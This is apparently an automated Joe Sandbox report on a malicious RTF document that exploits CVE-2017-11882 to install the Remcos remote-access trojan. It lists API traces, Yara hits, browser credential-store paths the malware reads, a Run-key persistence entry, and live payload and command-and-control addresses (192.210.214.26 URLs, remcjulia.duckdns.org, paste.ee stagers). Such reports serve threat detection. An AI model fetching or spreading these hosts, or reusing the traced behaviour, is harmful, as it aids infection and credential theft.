Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	11_2_004488ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: IsValidCodePage,GetLocaleInfoW,	11_2_00451CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	11_2_00451F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	11_2_00451F9B

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00448957 GetSystemTimeAsFileTime,

11_2_00448957

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0041B60D GetUserNameW,

11_2_0041B60D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

11_2_00449190

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.4179110.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.4179110.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.872587798.0000000000A01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.391262548.0000000003F96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3212, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

11_2_0040BA12

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		11_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: \key3.db		11_2_0040BB30

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-76C83U

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.4179110.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.4179110.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.872587798.0000000000A01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.391262548.0000000003F96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3212, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: cmd.exe

11_2_0040569A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	321 Scripting	Valid Accounts	1 Native API	321 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	43 Exploitation for Client Execution	1 DLL Side-Loading	1 Bypass User Account Control	2 Obfuscated Files or Information	111 Input Capture	1 Account Discovery	Remote Desktop Protocol	111 Input Capture	23 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	121 Command and Scripting Interpreter	1 Windows Service	1 Access Token Manipulation	1 Install Root Certificate	2 Credentials In Files	1 System Service Discovery	SMB/Windows Admin Shares	3 Clipboard Data	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	11 Registry Run Keys / Startup Folder	1 Windows Service	1 DLL Side-Loading	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	3 PowerShell	Network Logon Script	321 Process Injection	1 Bypass User Account Control	LSA Secrets	34 System Information Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Registry Run Keys / Startup Folder	1 Masquerading	Cached Domain Credentials	2 Security Software Discovery	VNC	GUI Input Capture	213 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Virtualization/Sandbox Evasion	Proc Filesystem	2 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	321 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 Remote System Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf	61%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882
SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf	56%	Virustotal		Browse
SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf	100%	Avira	HEUR/Rtf.Malformed

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6C8F4896-7948-479F-8EE2-C642D1E95148}.tmp	100%	Avira	EXP/CVE-2017-11882.Gen

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
remcjulia.duckdns.org	12%	Virustotal		Browse
uploaddeimagens.com.br	7%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://geoplugin.net/json.gp	100%	URL Reputation	phishing
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	100%	URL Reputation	phishing
https://contoso.com/	0%	URL Reputation	safe
http://go.microsoft.c	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://192.210.214.26/26677/IEinternetMonkeykisserpdf.html~~C:	100%	Avira URL Cloud	malware
https://www.google.com;	0%	Avira URL Cloud	safe
http://192.210.214.26/26677/IEinternetMonkeykisserpdf.htmlj	100%	Avira URL Cloud	malware
remcjulia.duckdns.org	100%	Avira URL Cloud	malware
http://192.210.214.26/26677/RMC.txt	100%	Avira URL Cloud	malware
https://lesferch.github.io/DesktopPic	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br	0%	Avira URL Cloud	safe
https://analytics.paste.ee;	0%	Avira URL Cloud	safe
remcjulia.duckdns.org	12%	Virustotal		Browse
http://192.210.214.26/26677/IEinternetMonkeykisserpdf.html	100%	Avira URL Cloud	malware
http://192.210.214.26/26677/RMC.txt	15%	Virustotal		Browse
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com;	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029	5%	Virustotal		Browse
https://uploaddeimagens.com.br	7%	Virustotal		Browse
http://192.210.214.26/26677/IEinternetMonkeykisserpdf.html	15%	Virustotal		Browse
https://lesferch.github.io/DesktopPic	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
paste.ee	104.21.84.67	true	false		high
remcjulia.duckdns.org	192.3.101.153	true	true	12%, Virustotal, Browse	unknown
uploaddeimagens.com.br	172.67.215.45	true	true	7%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://paste.ee/d/4yAaN	false		high
http://192.210.214.26/26677/RMC.txt	true	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
remcjulia.duckdns.org	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://192.210.214.26/26677/IEinternetMonkeykisserpdf.html	true	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029	true	5%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000008.00000002.391262548.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paste.ee/d/4yAaN=	wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.entrust.net/server1.crl0	wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	false		high
http://192.210.214.26/26677/IEinternetMonkeykisserpdf.html~~C:	EQNEDT32.EXE, 00000002.00000002.357678904.000000000052F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.entrust.net03	wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000008.00000002.391262548.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com;	wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://contoso.com/Icon	powershell.exe, 00000008.00000002.391262548.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://analytics.paste.ee	wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.diginotar.nl/cps/pkioverheid0	wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://192.210.214.26/26677/IEinternetMonkeykisserpdf.htmlj	EQNEDT32.EXE, 00000002.00000002.358501991.00000000035C0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://geoplugin.net/json.gp	RegAsm.exe	true	URL Reputation: phishing	unknown
https://www.google.com	wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://lesferch.github.io/DesktopPic	wscript.exe, 00000005.00000002.366481906.0000000002BEE000.00000004.00000020.00020000.00000000.sdmp, luckymokeykissinglover.vbs.2.dr, IEinternetMonkeykisserpdf[1].htm.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gp/C	powershell.exe, 00000008.00000002.391262548.0000000003F96000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp	true	URL Reputation: phishing	unknown
https://uploaddeimagens.com.br	powershell.exe, 00000008.00000002.391262548.00000000023CB000.00000004.00000800.00020000.00000000.sdmp	true	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000008.00000002.391262548.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000008.00000002.391262548.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paste.ee/d/4yAaNgb	wscript.exe, 00000005.00000002.366290076.0000000000795000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363991257.0000000000780000.00000004.00000020.00020000.00000000.sdmp	false		high
https://paste.ee/	wscript.exe, 00000005.00000003.365225964.0000000000805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366343739.0000000000805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363991257.0000000000815000.00000004.00000020.00020000.00000000.sdmp	false		high
https://analytics.paste.ee;	wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://go.microsoft.c	powershell.exe, 00000008.00000002.391075919.000000000039A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdnjs.cloudflare.com	wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com;	wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://ocsp.entrust.net0D	wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000006.00000002.486553628.000000000232B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.391262548.0000000002291000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.comodo.com/CPS0	wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	false		high
https://secure.gravatar.com	wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://themes.googleusercontent.com	wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.84.67	paste.ee	United States	13335	CLOUDFLARENETUS	false
172.67.215.45	uploaddeimagens.com.br	United States	13335	CLOUDFLARENETUS	true
192.3.101.153	remcjulia.duckdns.org	United States	36352	AS-COLOCROSSINGUS	true
192.210.214.26	unknown	United States	36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430888
Start date and time:	2024-04-24 10:23:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winRTF@14/17@299/4
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 100% Number of executed functions: 61 Number of non-executed functions: 196
Cookbook Comments:	Found application associated with file extension: .rtf Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer Override analysis time to 76209.7449551583 for current running targets taking high CPU consumption Override analysis time to 152419.489910317 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
Execution Graph export aborted for target powershell.exe, PID 2040 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:24:20	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\RMCD.vbs
01:24:28	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\RMCD.vbs
10:24:00	API Interceptor	60x Sleep call for process: EQNEDT32.EXE modified
10:24:04	API Interceptor	140x Sleep call for process: wscript.exe modified
10:24:07	API Interceptor	281x Sleep call for process: powershell.exe modified
10:24:19	API Interceptor	4292600x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.84.67	Chitanta bancara - #113243.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/u4bvR
	rdevuelto_Pagos.wsf	Get hash	malicious	AgentTesla	Browse	paste.ee/d/SDfNF
	Product list 0980DF098A7.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/enGXm
	Payment_advice.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/wXm0Y
	SHREE GANESH BOOK SERVICES-347274.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/eA3FM
	dereac.vbe	Get hash	malicious	Unknown	Browse	paste.ee/d/JZHbW
	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/kmRFs
	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/cJo7v
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/EgkAG
	87645345.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/IJGyf
172.67.215.45	xF3wienia PO2102559-1.xlsx	Get hash	malicious	Unknown	Browse
	Reconfirm Details.vbs	Get hash	malicious	AgentTesla	Browse
	72625413524.vbs	Get hash	malicious	XWorm	Browse
	Purchase Inquiry.vbs	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	Get hash	malicious	Remcos	Browse
	Invoice No. 03182024.docx	Get hash	malicious	Remcos	Browse
	Payment Advice for Invoice 2024 0904.vbs	Get hash	malicious	FormBook	Browse
	TNT Invoicing_pdf.vbs	Get hash	malicious	FormBook	Browse
	DHL Shipping Documents_pdf.vbs	Get hash	malicious	AgentTesla	Browse
	P.O.109961.xls	Get hash	malicious	Remcos	Browse
192.3.101.153	INTERGOMA_SHPK_invoice.xls	Get hash	malicious	Unknown	Browse	192.3.101.153/786/kml.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
remcjulia.duckdns.org	SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtf	Get hash	malicious	Remcos	Browse	192.3.101.153
paste.ee	iwjvkEAIQa.rtf	Get hash	malicious	Unknown	Browse	172.67.187.200
	New Order - DUBAI BURJ KHALIFA LLC - PRICE ENQUIRY - RFQ 60000764690.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.187.200
	orden de compra.vbs	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	Reconfirm Details.vbs	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	New order-Docs0374.xls	Get hash	malicious	Unknown	Browse	104.21.84.67
	gmb.xls	Get hash	malicious	Unknown	Browse	104.21.84.67
	72625413524.vbs	Get hash	malicious	XWorm	Browse	172.67.187.200
	Purchase Inquiry.vbs	Get hash	malicious	AgentTesla	Browse	172.67.187.200
	bZA95up38s.rtf	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	mWimHae6l9.exe	Get hash	malicious	Unknown	Browse	172.67.187.200
uploaddeimagens.com.br	xF3wienia PO2102559-1.xlsx	Get hash	malicious	Unknown	Browse	172.67.215.45
	orden de compra.vbs	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	Reconfirm Details.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	gmb.xls	Get hash	malicious	Unknown	Browse	104.21.45.138
	72625413524.vbs	Get hash	malicious	XWorm	Browse	172.67.215.45
	Purchase Inquiry.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	bZA95up38s.rtf	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	Get hash	malicious	Remcos	Browse	172.67.215.45
	SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	Invoice No. 03182024.docx	Get hash	malicious	Remcos	Browse	172.67.215.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	Enquiry 230424.bat	Get hash	malicious	Remcos, DBatLoader	Browse	23.95.235.29
	PO#0023298413.xls	Get hash	malicious	Unknown	Browse	107.173.4.2
	Ref_Order04.xls	Get hash	malicious	Unknown	Browse	198.12.81.139
	orden de compra.vbs	Get hash	malicious	AgentTesla	Browse	192.3.243.154
	RICHIESTA-QUOTAZIONI.jar	Get hash	malicious	STRRAT	Browse	107.172.148.197
	768.xla.xlsx	Get hash	malicious	Unknown	Browse	23.95.60.77
	cb9YYjPyUR.jar	Get hash	malicious	STRRAT	Browse	107.172.148.197
	TcnD64eVFK.exe	Get hash	malicious	Remcos	Browse	107.175.229.143
	Comprobante.xlam.xlsx	Get hash	malicious	GuLoader	Browse	23.95.60.77
	Gam.xls	Get hash	malicious	Unknown	Browse	23.94.36.10
AS-COLOCROSSINGUS	Enquiry 230424.bat	Get hash	malicious	Remcos, DBatLoader	Browse	23.95.235.29
	PO#0023298413.xls	Get hash	malicious	Unknown	Browse	107.173.4.2
	Ref_Order04.xls	Get hash	malicious	Unknown	Browse	198.12.81.139
	orden de compra.vbs	Get hash	malicious	AgentTesla	Browse	192.3.243.154
	RICHIESTA-QUOTAZIONI.jar	Get hash	malicious	STRRAT	Browse	107.172.148.197
	768.xla.xlsx	Get hash	malicious	Unknown	Browse	23.95.60.77
	cb9YYjPyUR.jar	Get hash	malicious	STRRAT	Browse	107.172.148.197
	TcnD64eVFK.exe	Get hash	malicious	Remcos	Browse	107.175.229.143
	Comprobante.xlam.xlsx	Get hash	malicious	GuLoader	Browse	23.95.60.77
	Gam.xls	Get hash	malicious	Unknown	Browse	23.94.36.10
CLOUDFLARENETUS	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.27.85
